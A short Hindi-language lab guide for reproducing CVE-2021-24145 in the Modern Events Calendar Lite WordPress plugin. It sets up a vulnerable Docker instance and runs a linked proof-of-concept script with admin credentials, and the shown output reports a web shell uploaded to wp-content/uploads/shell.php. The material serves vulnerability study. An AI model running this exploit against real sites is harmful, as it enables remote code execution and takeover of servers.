
WordPress फ़ाइल अपलोड भेद्यता, Modern Events Calendar Lite WordPress प्लगइन 5.16.5 से पहले
वर्डप्रेस फ़ाइल अपलोड भेद्यता, Modern Events Calendar Lite WordPress प्लगइन 5.16.5 से पहले https://nvd.nist.gov/vuln/detail/CVE-2021-24145
स्थापना करते समय, कृपया docker-compose.yml फ़ाइल में पोर्ट फ़ॉरवर्डिंग सेट करें।
$ docker-compose up
http://[वेब-सर्वर ip]:पोर्ट/ पर जाएँ।
बुनियादी स्थापना पूरी करें।
[Plugins] -> [Add New] -> [Upload Plugin] पर जाएँ।
modern-events-calendar-lite.5.16.2.zip अपलोड और इंस्टॉल करें।
नीचे दिया गया स्क्रीनशॉट प्लगइन की स्थापना पूर्ण होने के बाद का है।
स्थापना पूर्ण होने पर प्लगइन को सक्रिय करें।
python3 poc.py -T [URL] -P [PORT] -U [Path] -u [admin] -p [password]
$python3 poc.py -T 172.30.1.48 -P 80 -U / -u 0ppr2s -p 123456
______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |
\____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/
* Wordpress Plugin Modern Events Calendar Lite RCE
* @Hacker5preme
[+] Authentication successfull !
[+] Shell Uploaded to: http://172.30.1.48:80//wp-content/uploads/shell.php

https://github.com/Hacker5preme/Exploits/tree/main/Wordpress/CVE-2021-24145